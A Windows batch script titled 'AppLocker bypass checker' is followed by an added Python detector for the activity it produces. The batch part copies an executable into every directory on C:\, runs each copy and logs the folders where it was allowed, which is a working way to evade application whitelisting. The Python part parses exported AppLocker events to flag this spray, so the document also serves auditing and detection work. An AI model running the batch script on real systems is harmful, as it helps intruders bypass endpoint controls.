applocker bypass checker
@echo off
REM Influenced by the PowerShell-based AppLocker Bypass Checker (created by Tom Aafloen), which attempts to find folders that are both writable
REM and executable under C:\Windows (whitelisted by AppLocker default rules).
REM
REM However, environments implementing application whitelisting may also block powershell.exe.
REM
REM This is intended to be a non-PowerShell method of finding AppLocker bypasses under the entire C:\. Replace puttygen.exe as appropriate. Run as a
REM standard (non-admin) user ;D. Bypasses are listed in bypasses.txt.
C:
cd C:\TEMP\
echo Creating list of all directories and sub-directories
dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt
echo Attempting to copy puttygen.exe to all folders
for /F "tokens=*" %%A in (dirs.txt) do copy "C:\Temp\puttygen.exe" "%%A" /Y
echo Attempting to execute puttygen.exe (find whitelisted locations)
for /F "tokens=*" %%A in (dirs.txt) do if exist "%%A\puttygen.exe" icacls "%%A\puttygen.exe" /grant %USERNAME%:f & start "" "%%A\puttygen.exe" && tasklist /v | findstr "puttygen.exe" > executed.txt && for %%B in (executed.txt) do if not %%~zB==0 echo %%A >> bypasses.txt && taskkill /IM puttygen.exe /F && del /F executed.txt
echo Deleting puttygen.exe from all locations
for /F "tokens=*" %%A in (dirs.txt) do del /F "%%A\puttygen.exe"
echo Done
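From the defender's side, the copy-everywhere-then-launch-everywhere loop above is extremely noisy: under an enforced AppLocker policy it produces a burst of event 8004 (blocked) records for one user, all carrying the same file name but a different directory each time, plus a handful of 8002 (allowed) records for the directories the rules did not cover. The following Python is an added example, not part of the gist, that hunts for that pattern in exported AppLocker events. It assumes the event XML shape returned by Get-WinEvent's ToXml() or wevtutil qe /f:xml, with the user SID in a TargetUser element and the path in a FilePath element under UserData; the sample records, SIDs and directory names are constructed for the example. The threshold (same file name blocked in at least 10 directories within 15 minutes) is an assumption to tune per environment.

```python
import ntpath
import xml.etree.ElementTree as ET
from collections import defaultdict
from datetime import datetime, timedelta

BLOCKED = {"8004"}   # enforced block; 8003 is the audit-mode equivalent
ALLOWED = {"8002"}   # file was allowed to run


def _local(tag):
    """Strip the XML namespace so elements can be matched by local name only."""
    return tag.rsplit("}", 1)[-1]


def _parse_time(system_time):
    """Windows SystemTime carries up to 7 fractional digits; strptime accepts 6."""
    s = system_time.rstrip("Z")
    base, _, frac = s.partition(".")
    return datetime.strptime(f"{base}.{frac[:6] or '0'}", "%Y-%m-%dT%H:%M:%S.%f")


def parse_events(xml_text):
    """Return [(event_id, time, target_user, file_path)] from an <Events> export."""
    root = ET.fromstring(xml_text)
    out = []
    for ev in root.iter():
        if _local(ev.tag) != "Event":
            continue
        fields, when = {}, None
        for el in ev.iter():
            name = _local(el.tag)
            fields[name] = (el.text or "").strip()
            if name == "TimeCreated":
                when = _parse_time(el.get("SystemTime"))
        if "FilePath" in fields and when is not None:
            out.append((fields["EventID"], when, fields.get("TargetUser", "?"), fields["FilePath"]))
    return out


def find_spray(events, min_dirs=10, window=timedelta(minutes=15)):
    """Flag (user, file name) pairs blocked in many directories inside a short window,
    and report the directories where the same file name was allowed to run."""
    groups = defaultdict(lambda: {"blocked": set(), "allowed": set(), "times": []})
    for eid, when, user, path in events:
        directory, name = ntpath.split(path.upper())   # AppLocker paths use %OSDRIVE%-style variables
        g = groups[(user, name)]
        if eid in BLOCKED:
            g["blocked"].add(directory)
            g["times"].append(when)
        elif eid in ALLOWED:
            g["allowed"].add(directory)
    hits = {}
    for key, g in groups.items():
        if len(g["blocked"]) >= min_dirs and max(g["times"]) - min(g["times"]) <= window:
            hits[key] = {"blocked_dirs": len(g["blocked"]), "ran_from": sorted(g["allowed"])}
    return hits


def _event(eid, when, user, path):
    # Constructed record in the shape of an exported AppLocker "EXE and DLL" event (assumed layout).
    return (f'<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
            f'<System><EventID>{eid}</EventID><TimeCreated SystemTime="{when}"/></System>'
            f'<UserData><RuleAndFileData><PolicyName>EXE</PolicyName><TargetUser>{user}</TargetUser>'
            f'<FilePath>{path}</FilePath></RuleAndFileData></UserData></Event>')


# Constructed sample: one user sprays TOOL.EXE into 12 directories (all blocked) and it runs from one;
# a second user's ordinary allowed execution is included to show it is not flagged.
SPRAY_USER = "S-1-5-21-1000-2000-3000-1105"
SAMPLE = "<Events>" + "".join(
    [_event(8004, f"2024-05-01T09:00:{i:02d}.0000000Z", SPRAY_USER, f"%OSDRIVE%\\SCAN\\D{i}\\TOOL.EXE")
     for i in range(12)]
    + [_event(8002, "2024-05-01T09:00:20.0000000Z", SPRAY_USER, "%OSDRIVE%\\SCAN\\WRITABLE\\TOOL.EXE")]
    + [_event(8002, "2024-05-01T09:30:00.0000000Z", "S-1-5-21-1000-2000-3000-1106",
              "%PROGRAMFILES%\\VENDOR\\APP.EXE")]
) + "</Events>"


def run_sample():
    return find_spray(parse_events(SAMPLE))


if __name__ == "__main__":
    for (user, name), info in run_sample().items():
        print(f"{user}: {name} blocked in {info['blocked_dirs']} directories; "
              f"allowed from {info['ran_from']}")
```

The directories listed under ran_from are the ones to review: each is a location the effective policy allows for a standard user, so it is a candidate for an explicit exception to the default path rules. Run it in audit mode first, since in audit-only policies the same burst shows up as 8003 rather than 8004.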